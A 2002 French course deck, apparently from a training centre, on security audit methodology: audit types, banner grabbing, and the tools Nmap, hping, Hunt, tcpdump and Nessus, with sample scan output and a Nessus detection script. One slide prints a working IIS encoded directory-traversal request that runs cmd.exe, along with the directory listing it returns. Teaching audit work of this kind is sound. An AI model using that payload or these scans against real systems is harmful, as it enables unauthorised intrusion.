Progression Sécurité & réseaux TCP/IP - Cours1 : Révision réseaux Méthodologie d’audit 15/11/2002 Ciefa Poly-informatique 20/06/2002 - Ciefa Poly-informatique

Ciefa Poly-informatique Plan du cours Différents types d’audit Pistes possibles d’audit Outils d’audit et d’attaque 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Introduction L’audit de sécurité est la première étape de la démarche conduisant à la définition et à la mise en place d’une politique sécurité. But : donner à tout responsable de système d’information, une image pertinente de l’état de sécurité de ses moyens informatiques face aux menaces et risques les plus couramment référencés dans l’état de l’art de la sécurité des systèmes d’information. Destiné à relever et lister les vulnérabilités éventuelles du système d’information. Porte donc à la fois sur : l’organisation l’implémentation des moyens informatiques l’exploitation de ces moyens 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Partie 1 Différents types d’audit Pistes possibles d’audit Outils d’audit et d’attaque 15/11/2002 Ciefa Poly-informatique

Différents types d’audit Audit de vérification => analyse de l’état du système Audit d’agrément => conformité à un référentiel prédéfini Audit intrusif => recherche active des failles 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Audit de vérification Analyse de l’état d’un système ou d’un réseau - Organisation (personnel, procédures) - Configuration (réseau, organisationnelle) - Exploitation (ressources) - Compétence (résultats en accords avec moyens mis en œuvre) - Protocoles utilisés Vérification par rapport : - aux bonnes pratiques du métier - à la politique de sécurité - aux besoins exprimés par le demandeur Indépendant de tout travail existant ; permet une bonne idée de la situation 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Audit d’agrément Développement d’un document d’exigences de sécurité ou règles d’exploitation exhaustives - Consensus entre les acteurs : utilisateurs, administrateurs, sécurité… - Spécifique à une architecture, un ensemble de produits ou un environnement précis - Accompagné d’un cahier d’agrément expliquant comment vérifier les exigences => Formalisme L’agrément vérifie le respect des exigences ou règles par rapport au référentiel 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Audit intrusif Le seul audit dont le résultat sensibilise les hiérarchies - Recherche active de failles - Base de données de vulnérabilités Approche par la tentative d’intrusion - Réalisée sans les exploitants - Dépendant de la compétence de l’auditeur - Dans un environnement plus large Mêmes outils que ces attaquants malveillants 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Nécessité d’un audit ? En France : 90% des réseaux informatiques sont vulnérables 65% des entreprises sont victimes d’intrusions 95% de ces intrusions ne sont même pas détectées En 2001, les attaques informatiques ont représenté un coût global de 1600 milliards de dollars. En 2001, 85% des entreprises et des services publics américains ont rapporté une intrusion informatique telle qu'un vol d'information propriétaire, une fraude financière, l'intrusion de personnes extérieures dans leur système, une attaque de déni de service ou un sabotage de leurs données ou réseau. 40% des entreprises interrogées ont rapporté une intrusion par un tiers extérieur (20% en 1997). 38% ont détecté une attaque de type Déni de service (24% en 1998). (Source: 2001 Computer Crime & Security Survey, Computer Security Institute). 15/11/2002 Ciefa Poly-informatique

Exemple d’audit : architecture réseau Objectif : déterminer les points faibles d’une architecture Méthodologie : - Analyse fonctionnelle - Plan d’adressage, cloisonnement IP - Rôle des sous réseaux et de chaque composant - Redondance des protections - Choix des matériels et logiciels - Recherche des éléments sur lesquels repose la sécurité - Recherche des communications avec l’extérieur - Plan de secours - Résistance au déni de service - … 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Tests d’intrusion Définition : tentative de compromission de la sécurité Types de tests d’intrusion : - de l’extérieur : test d’intrusion externe - de l’intérieur : audit intrusif interne Sans connaissance : intrus externe à l’entreprise Avec connaissances internes : reproduit le cas d’un employé malveillant => Souvent réalisés après résultats de l’audit pour limiter les dégâts (DoS) 15/11/2002 Ciefa Poly-informatique

Tests de vulnérabilité Vulnérabilités : - faille dans un logiciel - erreur de configuration d’un équipement Outils : - Nessus : tout en un - Recherche et tests de ports ouverts : Nmap, hping Objectifs : - Trouver, à distance et de manière automatique, des services ouverts - Tenter de déterminer si une vulnérabilité connue est présente 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Partie 2 Différents types d’audit Pistes possibles d’audit Outils d’audit et d’attaque 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Utilisation des ports Ports TCP : plupart des services classiques souvent ouverts (21, 22, 23, 25, 80, …) Ports UDP : scan de port fermé => flag RST facilement filtrable par firewall… => seul moyen est alors de tester les applications courantes ftp Scan NMAP option –0 sur chaque port => assurance de bonnes indications sur OS (dans cas de routeur adsl ou autre…) 15/11/2002 Ciefa Poly-informatique

Recherche des bannières Service FTP : $ ftp 137.194.200.214 Connected to 137.194.200.214. 220 FTP server (Hummingbird Communications Ltd. (HCLFTPD) Version 6.1.0.0) ready. Service SSH : $ telnet 137.194.200.214 22 Trying 137.194.200.214... Connected to 137.194.200.214. Escape character is '^]'. SSH-1.99-OpenSSH_3.0.2p1 Debian 1:3.0.2p1-9 Service Telnet : $ telnet 137.194.200.214 Debian GNU/Linux 2.2 serveur.ssir.com Login : Service SMTP : $ telnet 137.194.200.214 25 ... 220 serveur.ssir.com ESMTP Exim 3.12 #1 Mon, 10 Jun 2002 22:56:32 +0200 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Faille serveur IIS =>un serveur IIS peut être sensible aux attaques de type URL encodée $ echo "GET /scripts/..%255c..%255c..%255cwinnt/System32/cmd.exe?/c+dir+c:\\ HTTP/1.0 " | stunnel -c -r 137.194.200.214:443 HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Server: Microsoft-IIS/5.0 Date: Fri, 17 Jun 2002 19:47:35 GMT Content-Type: application/octet-stream Le volume dans le lecteur C n'a pas de nom. Le numero de serie du volume est 9C5F-0FCD Repertoire de c:\ 01/01/2000 01:19 <DIR> Documents and Settings 01/01/2000 01:19 <DIR> I386 10/06/2002 21:44 <DIR> Inetpub 05/05/2002 19:17 <DIR> My Music 17/06/2002 19:26 <DIR> Program Files 17/05/2002 16:18 600 PUTTY.RND 25/04/2002 06:21 <DIR> TEMP 18/06/2002 20:46 <DIR> WINNT 1 fichier(s) 1á223á476 octets 7 Rep(s) 3á385á342á976 octets libres 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Autres pistes En cas de présence d’un routeur passerelle connue du réseau : essai adresse interne pour IP Spoofing… Travail sur les TTL (pour déterminer OS, architecture, …) Passage mode passif du FTP (pasv) pour trouver adresse interne par exemple… Exploitation services comme SMTP, etc… 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique Partie 3 Différents types d’audit Pistes possibles d’audit Outils d’audit et d’attaque 15/11/2002 Ciefa Poly-informatique

Outils d’audit et d’attaque Nmap Hping Hunt Nessus Tcpdump Ethereal 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique NMAP Développé et disponible sur http://www.insecure.org Scanner de ports et de machines Référence de la prise d’empreinte Utilisation : « nmap <options> machine » 15/11/2002 Ciefa Poly-informatique

NMAP : principales options nmap –O : OS Fingerprint nmap --osscan_guess : Option non référencée donnant les résultats probables de la prise d’empreinte en cas d’échec nmap –P0 : pas de ping (utile derrière un firewall) nmap –PT : TCP Ping nmap –p 1:1024 : Liste de ports à scanner 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique NMAP : osscan_guess # nmap --osscan_guess -sS -O -p 19-26 -n -P0 192.168.148.31 Starting nmap V. 2.54BETA5 ( www.insecure.org/nmap/ ) Interesting ports on (192.168.148.31): (The 6 ports scanned but not shown below are in state: closed) Port State Service 22/tcp open ssh 25/tcp open smtp TCP Sequence Prediction: Class=random positive increments Difficulty=2830 (Medium) Aggressive OS guesses: FreeBSD 3.2-STABLE (91%), Microsoft NT 4.0 Server SP5 + 2047 Hotfixes (90%), Windows 2000 RC1 through final release (90%), Windows 2000 Professional, Build 2128 (90%), Windows Millenium Edition v4.90.3000 (90%), HP-UX 10.20 (89%), Cisco IOS 12.0(3.3)S (perhaps a 7200) (88%), F5labs Big/IP HA TCP/IP Load Balancer (BSDI kernel/x86) (88%) No exact OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi). 15/11/2002 Ciefa Poly-informatique

NMAP : principaux types de scan nmap –sT (Scan par défaut): connexion TCP nmap –sS : TCP SYN scan nmap –sF : TCP FIN scan nmap –sU : UDP scan nmap –sP : ping scan utilisé pour scanner des plages d’adresses nmap –s0 : scan de protocoles transportés par IP 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique HPING Boîte à outils permettant de créer des paquets IP Permet de tester finement des règles de filtrage Analyse les paquets retour précisément 15/11/2002 Ciefa Poly-informatique

HPING : principales options hping –SFRA : bits SYN,FIN,RST,ACK Hping –1 : ICMP (-C pour type) hping –2 : UDP hping –c N : N paquets (défaut : illimité) hping –T : Traceroute 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique HPING 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique HPING 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique HUNT Outil de surveillance réseau évolué Permet de surveiller un réseau en reconstituant les sessions TCP Permet d’insérer des paquets dans une session TCP ( Génère une tempête ACK) 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique TCPDUMP Sniffer réseau en ligne de commande Fonctionnalités de filtrage avancées (librairie pcap) Exemple : tcpdump –i eth0 –p host 192.168.2.3 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique TCPDUMP 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique NESSUS Sonde d’audit en réseau permettant de : Scanner les vulnérabilités réseau Scanner les vulnérabilités applicatives (bannières, CGI, buffer-overflows,…) Élément actif qui réalise les attaques (les plus nocives sont désactivées par défaut)  Attention aux DoS sur les sondes de détection 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique NESSUS Disponible sur http://www.nessus.org Clients pour Unix, Windows Serveur pour Unix seulement 15/11/2002 Ciefa Poly-informatique

NESSUS : Fonctionnement 15/11/2002 Ciefa Poly-informatique

Ciefa Poly-informatique NESSUS Mise à jour régulière des vulnérabilités Utilise un langage de script spécifique  Personnalisation possible 15/11/2002 Ciefa Poly-informatique

NESSUS : Interface client # # The script code starts here port = get_kb_item("Services/www"); if(!port)port = 80; banner = get_kb_item(string("www/banner/", port)); if(!banner) { if(get_port_state(port)) soc = open_sock_tcp(port); if(soc) req = string("GET / HTTP/1.0\r\n\r\n"); send(socket:soc, data:req); banner = recv(socket:soc, length:1024); close(soc); } if(banner) if(egrep(pattern:"^Server: Zope\/Zope 2\.((0\..*)|(1\.[0-6]))", string:banner)) security_hole(port); 15/11/2002 Ciefa Poly-informatique

NESSUS : Interface client 15/11/2002 Ciefa Poly-informatique

NESSUS : Interface client 15/11/2002 Ciefa Poly-informatique

NESSUS : Interface client 15/11/2002 Ciefa Poly-informatique

NESSUS : Interface client 15/11/2002 Ciefa Poly-informatique

NESSUS : Interface client 15/11/2002 Ciefa Poly-informatique

NESSUS : Interface client 15/11/2002 Ciefa Poly-informatique